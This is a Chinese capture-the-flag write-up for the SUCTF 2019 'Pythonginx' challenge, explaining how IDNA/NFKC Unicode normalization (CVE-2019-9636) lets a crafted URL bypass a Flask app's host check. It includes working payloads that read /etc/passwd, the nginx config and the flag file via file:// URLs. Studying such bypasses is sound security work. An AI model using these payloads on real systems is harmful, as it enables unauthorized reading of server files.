• [SUCTF 2019]Pythonginx


    0x00知识点

    2019black hat一个议题
    PPT:

    https://i.blackhat.com/USA-19/Thursday/us-19-Birch-HostSplit-Exploitable-Antipatterns-In-Unicode-Normalization.pdf
    

    内容如下:
    b33f50411848b2130d180a0c1b9ae696.png

    这也就是说我们传入的url为http://evil.c℀.com在经过上述处理过后便成为了http://evil.ca/c.com
    

    在unicode中字符℀(U+2100),当IDNA处理此字符时,会将℀变成a/c,因此当你访问此url时,dns服务器会自动将url重定向到另一个网站。如果服务器引用前端url时,只对域名做了限制,那么通过这种方法,我们就可以轻松绕过服务器对域名的限制了。

    0x01非预期解

    CVE-2019-9636:urlsplit不处理NFKC标准化

    file:////suctf.cc/../../../../../etc/passwd
    
    URLs encoded with Punycode/IDNA use NFKC normalization to decompose characters [1]. This can result in some characters introducing new segments into a URL.
    
    For example, uFF03 is not equal to '#' under direct comparison, but normalizes to '#' which changes the fragment part of the URL. Similarly u2100 normalizes to 'a/c' which introduces a path segment.
    
    Currently, urlsplit() does not normalize, which may result in it returning a different netloc from what a browser would
    
    >>> u = "https://example.comuFF03@bing.com"
    >>> urlsplit(u).netloc.rpartition("@")[2]
    bing.com
    
    >>> # Simulate
    >>> u = "https://example.comuFF03@bing.com".encode("idna").decode("ascii")
    >>> urlsplit(u).netloc.rpartition("@")[2]
    example.com
    
    (Note that .netloc includes user/pass and .rpartition("@") is often used to remove it.)
    
    This may be used to steal cookies or authentication data from applications that use the netloc to cache or retrieve this information.
    
    The preferred fix for the urllib module is to detect and raise ValueError if NFKC-normalization of the netloc introduce any of '/?#@:'. Applications that want to avoid this error should perform their own decomposition using unicodedata or transcode to ASCII via IDNA.
    
    >>> # New behavior
    >>> u = "https://example.comuFF03@bing.com"
    >>> urlsplit(u)
    ...
    ValueError: netloc 'example.com#@bing.com' contains invalid characters under NFKC normalization
    
    >>> # Workaround 1
    >>> u2 = unicodedata.normalize("NFKC", u)
    >>> urlsplit(u2)
    SplitResult(scheme='https', netloc='example.com', path='', query='', fragment='@bing.com')
    
    >>> # Workaround 2
    >>> u3 = u.encode("idna").decode("ascii")
    >>> urlsplit(u3)
    SplitResult(scheme='https', netloc='example.com', path='', query='', fragment='@bing.com')
    
    Note that we do not address other characters, such as those that convert into period. The error is only raised for changes that affect how urlsplit() locates the netloc and the very common next step of removing credentials from the netloc.
    
    This vulnerability was reported by Jonathan Birch of Microsoft Corporation and Panayiotis Panayiotou (p.panayiotou2@gmail.com) via the Python Security Response Team. A CVE number has been requested.
    
    [1]: https://unicode.org/reports/tr46/
    
    

    链接
    https://bugs.python.org/issue36216

    0x02Nginx重要文件位置

    配置文件存放目录:/etc/nginx
    主配置文件:/etc/nginx/conf/nginx.conf
    管理脚本:/usr/lib64/systemd/system/nginx.service
    模块:/usr/lisb64/nginx/modules
    应用程序:/usr/sbin/nginx
    程序默认存放位置:/usr/share/nginx/html
    日志默认存放位置:/var/log/nginx
    配置文件目录为:/usr/local/nginx/conf/nginx.conf
    
    

    0x03解题

    打开题目,给了源码

    from flask import Flask, Blueprint, request, Response, escape ,render_template
    from urllib.parse import urlsplit, urlunsplit, unquote
    from urllib import parse
    import urllib.request
    
    app = Flask(__name__)
    
    # Index
    @app.route('/', methods=['GET'])
    def app_index():
        return render_template('index.html')
    
    @app.route('/getUrl', methods=['GET', 'POST'])
    def getUrl():
        url = request.args.get("url")
        host = parse.urlparse(url).hostname
        if host == 'suctf.cc':
            return "我扌 your problem? 111"
        parts = list(urlsplit(url))
        host = parts[1]
        if host == 'suctf.cc':
            return "我扌 your problem? 222 " + host
        newhost = []
        for h in host.split('.'):
            newhost.append(h.encode('idna').decode('utf-8'))
        parts[1] = '.'.join(newhost)
        #去掉 url 中的空格
        finalUrl = urlunsplit(parts).split(' ')[0]
        host = parse.urlparse(finalUrl).hostname
        if host == 'suctf.cc':
            return urllib.request.urlopen(finalUrl).read()
        else:
            return "我扌 your problem? 333"
    
    if __name__ == "__main__":
        app.run(host='0.0.0.0', port=80)
    
    审计代码
    

    前两个判断 host 是否是 suctf.cc ,如果不是才能继续。然后第三个经过了 decode('utf-8') 之后传进了 urlunsplit 函数,在第三个判断中又必须要等于 suctf.cc 才行。
    直接构造
    file://suctf.c℆sr/local/nginx/conf/nginx.conf(另一种绕过方式是利用ℂ来代替c及进行绕过),这样可以读到flag的位置:

    server { listen 80; location / { try_files $uri @app; } location @app { include uwsgi_params; uwsgi_pass unix:///tmp/uwsgi.sock; } location /static { alias /app/static; } # location /flag { # alias /usr/fffffflag; # } }
    

    读flag

    http://d7844ab4-68f7-4e76-9432-a112b65afa1f.node3.buuoj.cn/getUrl?url=file://suctf.c%E2%84%86sr/fffffflag
    

    参考链接

    https://blog.csdn.net/qq_42181428/article/details/99741920

  • 相关阅读:
    foreach_and_函数
    集合
    二维数组
    二维数组的操作
    字符串类型的一些操作
    数组循环的操作及思路
    数组操作
    js各种获取当前窗口页面宽度、高度的方法
    Jquery 获取 radio选中值,select选中值
    jQuery效果:隐藏、显示、切换、滑动、淡入淡出、动画
  • 原文地址:https://www.cnblogs.com/wangtanzhi/p/12181032.html
Copyright © 2020-2023  润新知